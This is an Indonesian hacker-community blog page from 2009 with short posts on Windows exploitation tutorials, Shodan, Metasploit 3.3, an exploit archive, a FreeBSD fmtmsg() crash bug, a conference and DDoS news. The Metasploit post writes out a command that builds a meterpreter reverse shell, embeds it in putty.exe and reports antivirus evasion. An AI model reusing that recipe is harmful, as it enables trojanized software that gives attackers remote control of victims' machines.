Currently Browsing: News

Windows Hacking Tutorial

Tutorial hacking windows yang dibuat oleh Peter Van Eckhoutte pada blognya menurut saya sangat luar biasa, umumnya kita menemukan kesulitan menemukan resource “darimana harus memulai untuk belajar hacking windows”. Peter membuat segalanya menjadi jauh lebih mudah bagi para pemula / newbie, penjelasannya sangat intuitive dan terstruktur dengan baik. Plus…contoh yang cukup up-to-date (terkecuali kalian ingin mengetahui tehnik exploitasi terbaru yang dapat bypass SEHOP 🙂 ). Tentu saja tutorial Metasploit Unleashed dari Offensive-Security juga layak dikunjungi, namun tutorial tersebut lebih mengarah kepada exploit development menggunakan metasploit. Tutorial peter memberikan penjelasan mulai basic overflow hingga penggunaan beragam tools, termasuk metasploit, yang biasanya membuat pengetahuan dasar para pemula lebih berbobot. Cukup install sistem operasi Microsoft Windows seperti Windows XP menggunakan Virtual Software seperti VirtualBox, install vulnerable software seperti yang tertulis dalam blog tersebut, install debugger, dan langsung belajar proses exploitasi windows. Setiap sistem operasi windows biasanya memiliki perbedaan seperti languange, service pack, dsb. Oleh sebab itu lokasi opcode tiap sistem tidaklah sama, yang paling penting adalah mengikuti tutorial tersebut (total ada 7 artikel secara berkesinambungan) dan langsung praktek, dengan begitu kita bisa langsung melihat dan merasakan proses pencarian seperti register, offset, opcode, dsb. Pada akhirnya kita akan merasakan bahwa membuat exploit (mungkin!) mirip seperti membuat keygen, layaknya memecahkan puzzle, dan asyiknya ini bisa mengisi waktu luang kita ;). Newbie this era should be very fun, lot of good stuff and resource for exploit development. Happy sploit-ing...
Read More of Windows Hacking Tutorial

SHODAN – “Hackerz” Search Engine?!

Another toys was born! SHODAN lets you find servers/ routers/ etc. by using the simple search bar up above. Most of the data in the index covers web servers at the moment, but there is some data on FTP, Telnet and SSH services as well. Interisting ketika membuka seclist dan membaca postingan ini. Ada yang menyebutnya kombinasi dari Google Hacking database dan another similiar project. Tapi lebih dari itu, searching target hacking pun sekarang jauh lebih mudah (bagi kalangan tertentu). Simple keyword seperti IIS 4.0 memberikan banyak hasil yang lebih bagus dari pencarian di google dengan metode yang spesifik seperti yang di terangkan oleh ihackstuff.com. Bahkan lebih jauh lagi, SHODAN bisa mencarikan anda router cisco yang berasal dari indonesia seperti ini. so, happy hacking and take care.. humm, i mean be...
Read More of SHODAN – “Hackerz” Search Engine?!

.metasploit framework 3.3 released.

.sudah 363 hari sejak release notes metasploit 3.2 beredar,kerja keras dari dev-team ataupun kontribusi dari para freelance, menyebabkan perkembangan framework API berbasis ruby ini cukup pesat,ya spirit of the open source pr0ject- .beberapa perubahan dalam release kali ini: — 123 new exploits,117 auxiliary modules. — dukungan terhadap ruby 1.9.1. — performance dan stability lebih baik,peningkatan dalam proses startup framework. — terintegrasi dengan OSVDB, exploit yang memiliki hubungan dengan OSVDB memiliki id referensi. — compatiblitas terhadap OS 32-bit ataupun 64-bit baik unix,mac OS,windows. — dukungan untuk JSP payloads, IPV6, NX dan DEP. — meterpreter mendukung screenshot,keylogger, ataupun packet sniffing. — msfencode dapat di embedded ke arbitry executables baik itu 32-bit ataupun 64-bit. .for more info metasploit’s 3.3 release notes. .masih ingat dengan artikel ini , meterpreter di encode XOR menggunakan shikata_ga_nai, dan lolos dari site virustotal. .berikut POC dari msfencode embedded to arbitry executables. [email protected]:/pentest/exploits/framework3$ ./msfconsole / / / (___ (___ ___ ___ ( ___ ___ | ) )| |___)|___ |___)| )|___)| ) |__/ _/ |__ |__ __/ | | |__ |// / =[ metasploit v3.4-dev [core:3.4 api:1.0] + -- --=[ 448 exploits - 216 auxiliary + -- --=[ 262 payloads - 22 encoders - 8 nops =[ svn r7564 updated today (2009.11.18) msf > version Framework: 3.4-dev.7554 Console : 3.4-dev.7537 ——————————————– [email protected]:/pentest/exploits/framework3$ ./msfpayload windows/meterpreter/reverse_tcp_allports LHOST=192.168.13.37 LPORT=443 R | ./msfencode -t exe -x /home/d0tz/putty.exe -o /home/d0tz/puttyw00t.exe [*] x86/shikata_ga_nai succeeded with size 102 (iteration=1) .hasil scan virustotal 2/41. .berikut merupakan hasil perbandingan metadata dari putty executable, [email protected]:/pentest/exploits/framework3$ exiftool -a -u -g1 /home/d0tz/putty.exe ---- ExifTool ---- ExifTool Version Number : 7.89 ---- System ---- File Name : putty.exe Directory : /home/d0tz File Size : 444 kB File Modification Date/Time : 2009:11:08 22:36:28+07:00 ---- File ---- File Type : Win32 EXE MIME Type : application/octet-stream ---- EXE ---- Machine Type : Intel 386 or later, and compatibles Time Stamp : 2007:04:29 18:43:12+07:00 PE...
Read More of .metasploit framework 3.3 released.

.active holocaust denier pwned.

.david irving sejarawan inggris yang menjadi pusat dari sebuah perdebatan luas mengenai kriminalisasi opini, dikenal dengan bukunya yang fenomenal yakni “Hitler’s War” tentang penyanggahan adanya kamp Auschwitz dan Hollocaust, pembantain para jews. .stop it, we doesn’t discuss about political conspiracy issue. .friday 13, group yang mengklaim dirinya dengan “Anti-Fascists hacker” mem-pawn irvingbooks.com dan fpp.co.uk web yang dikelola oleh david. .email message database leaked out. .zone-h...
Read More of .active holocaust denier pwned.

.offensive security exploit archive.

.h3ll0 f0lks setelah milw0rm terbengkelai dari september lalu, banyak spekulasi dari public tentang kesehatan empunya str0ke bahkan rum0r said he passed way, ya statement dari twitter-nya str0ke menyangkal berita tersebut. “I’m not dead yet, just being trolled” .bertepatan dengan itu, 4 november offensive security mengumumkan akan mengelola public exploit archieve menggantikan milw0rm. .check this out, offensive security exploit archive. .ternyata untuk submission/submit[at]offsec.com/ sudah berjalan lebih dari 1 bulan lalu dan menariknya bagi kalian yg h0bby membuat [email protected] priv8 ataupun CTF, offensive security menyediakan link untuk vulnerable software tersebut, tidak repot lagi search di site ini ataupun vendor site vulnerable software...
Read More of .offensive security exploit archive.

Typo bugs fmtmsg() on FreeBSD!

FreeBSD hacker juga manusia :P. Hal tersebut terbukti pada sebuah kesalahan kecil yang dibuat oleh developer FreeBSD pada file /usr/src/lib/libc/gen/fmtmsg.c, khususnya yang ada pada fungsi printfmt(). 01    /* 02     * Returns NULL on memory allocation failure, otherwise returns a pointer to 03     * a newly malloc()'d output buffer. 04     */ 05    static char * 06    printfmt(char *msgverb, long class, const char *label, int sev, 07        const char *text, const char *act, const char *tag) 08    { 09            size_t size; 10            char *comp, *output; 11            const char *sevname; 12 13            size = 32; 14        ... 15            if (text != MM_NULLTXT) 16                    size += strlen(text); 17            if (text != MM_NULLACT) 18                    size += strlen(act); 19       ... 20            if ((output = malloc(size)) == NULL) 21       ... 22            return (output); 23    } Seperti diketahui, fmtmsg adalah sebuah sebuah routines yang menghandle display message pada standard error dan atau system console. Berdasarkan manual page dari fmtmsg itu sendiri, kita bisa men-trigger bugs yang dimaksud dengan code sederhana seperti berikut: #include int main(int argc, char * argv[]) { fmtmsg(MM_UTIL | MM_PRINT, "BSD:ls", MM_ERROR, "illegal option -- z", MM_NULLACT, "BSD:ls:001"); return 0; } dan hasilnya… # gcc -o fmtbugs fmtbugs.c # ./fmtbugs Segmentation fault (core dumped) Ok, kenapa bisa kondisi Segfault terjadi?. Hal tersebut terjadi karena pada saat variable “MM_NULLACT” di check apakah bernilai NULL atau tidak, developer FreeBSD ‘tidak sengaja’ mengambil argument ‘text’ yang pada contoh code diatas bernilai “illegal option — z” dan tentunya akan terjadi segmentation fault karena mengambil nilai yang salah. Seharusnya nilai yang diambil adalah argument ‘act’ yang pada contoh code diatas bernilai MM_NULLACT. Info bugs ini di ambil dari link XORL blog dan FreeBSD Official site....
Read More of Typo bugs fmtmsg() on FreeBSD!

IDSECCONF2009 Press Release

JAKARTA, – 27 Oktober 2009, 31 Oktober – 1 November 2009 nanti, untuk kedua kalinya konferensi yang melibatkan sebagian besar komunitas keamanan TI di Indonesia akan berlangsung di Jakarta, tepatnya di Universitas AL-Azhar Indonesia dengan di dukung oleh Departemen Komunikasi dan Informatika Republik Indonesia dan berbagai sponsor lainnya. Indonesian Security Conference 2009 atau yang lebih dikenal IDSECCONF2009 ini adalah merupakan kali kedua event ini diadakan, pada event tahun ini pun tetap akan mencakup 4 jenis kegiatan besar yang akan di laksanakan selama 2 hari penuh. Kegiatan yang terselenggara atas kerjasama organisasi/komunitas TI non-profit dan pihak Universitas Al-Azhar Indonesia ini bertujuan untuk memberikan pencerahan ke khalayak umum, pelajar, mahasiswa, maupun kalangan Security Professional khususnya mengenai berbagai isu keamanan yang ada. Kegiatan yang berfokus pada masalah Teknologi Informasi khususnya Keamanan Teknologi Informasi dan Temu Komunitas ini akan di isi kegiatan Seminar 2 hari dengan keynote speaker dari DEPKOMINFO, UAI, Dr. Yono Reksoprodjo, dan Jim Geovedi, serta 8 orang pembicara. Selain itu juga terdapat 2 buah Diskusi Panel yang bertemakan “Seberapa Siapkah Indonesia menghadapi Perang Cyber”, dan “Regenerasi Hacker di Indonesia”, serta Perlombaan Hacking yang akan berjalan secara paralel di hari keduanya. Untuk permainan hacking, secara khusus peserta akan di seleksi secara online untuk didapatkan 10 kontestan yang akan mengadu kemampuan hacking mereka secara offline saat kegiatan berlangsung. Permainan ini rencananya akan digelar selama 1 hari penuh kegiatan, yang akan secara paralel dengan kegiatan di hari kedua. IDSECCONF2009 ini adalah salah satu cerminan upaya yang diberikan komunitas non-profit khususnya untuk kemajuan pendidikan anak bangsa serta sebagai salah satu upaya untuk mempercepat penyebaran ilmu Teknologi Informasi di berbagai kalangan. Kegiatan yang kedua kalinya ini merupakan kelanjutan kegiatan yang telah di lakukan tahun lalu di Yogyakarta, dan diharapkan akan dapat terus di laksanakan  di tahun-tahun berikutnya. http://2009.idsecconf.org Info Pendaftaran: http://2009.idsecconf.org/2009/10/pendaftaran.html Detail Kegiatan :...
Read More of IDSECCONF2009 Press Release

OpenBSD 4.6 PF ChangeLog

Scrubbing adalah salah satu feature andalan yang ada dalam Packet Filter(PF) Milik OpenBSD. Feature ini bertugas untuk melakukan normalisasi packet data yang masuk dan kemudian me-reassembles packet tersebut, hal tersebut bertujuan agar tidak ada packet data yang ambigu, selain itu juga scrubbing bisa melindungi serangan yang di tujukan kepada sistem operasi dengan men-drop packet TCP yang tidak valid. Nah, pada OpenBSD versi 4.6, Scrubbing ini di-integrasi secara langsung pada main ruleset. Jika biasanya anda menulis PF config file seperti berikut: scrub in all no-df max-mss 1440 Maka bisa dipastikan bahwa file config PF anda tidak akan di load, karena pada versi terbaru, para developer PF membuat-nya lebih simple dan menambahkan satu keyword match, jadi anda harus menggantinya menjadi: match in all scrub (no-df max-mss 1440) Beberapa perubahan yang terjadi pada PF maupun pada OpenBSD yang perlu diperhatikan sebelum melakukan upgrade dari versi 4.5 ke 4.6 bisa dilihat...
Read More of OpenBSD 4.6 PF ChangeLog

Meet Up @IdSec2009

Info lebih lengkap mengenai acara dan lain-lain bisa langsung menuju situs resmi idsecconf 2009. Kami dari kecoak elektronik masih tetap mendukung event kumpul-kumpul bagi komunitas security ini. Beberapa staff kecoak elektronik juga akan hadir, but don’t expect they will use known identity there ;). So, let’s meetup and see ya there...
Read More of Meet Up @IdSec2009

Twitter, Facebook fend off DoS attacks

Users looking to update their Twitter feeds or Facebook pages were likely disappointed Thursday morning, as a denial-of-service attack made both services hard to reach. Around 9 a.m. Eastern Time, the number of responses from micro-blogging service Twitter fell precipitously, reaching a bandwidth of 60 Mbps by 10:40 a.m. ET, according to Arbor Networks, a networking services firm. Twitter had reached nearly 200 Mbps prior to the drop. The service continued to be impacted Thursday afternoon, reaching a peak of 150 Mbps, about half of its normal peak for that time of day, according to Arbor. “As we recover, users will experience some longer load times and slowness,” Twitter stated on its status blog. “This includes timeouts to API clients. We’re working to get back to 100% as quickly as we can.” Users also complained of issues accessing Facebook. The service confirmed midday on Thursday that, it too, had suffered a denial-of-service attack. “You may have had trouble accessing Facebook earlier today because of network issues related to an apparent distributed denial-of-service attack,” the social network stated on its own Facebook page. “We have restored full access for most people. We’ll keep monitoring the situation to make sure you have the reliable experience you expect from us.” HOW TO PREVENT IT ? HERE Source...
Read More of Twitter, Facebook fend off DoS attacks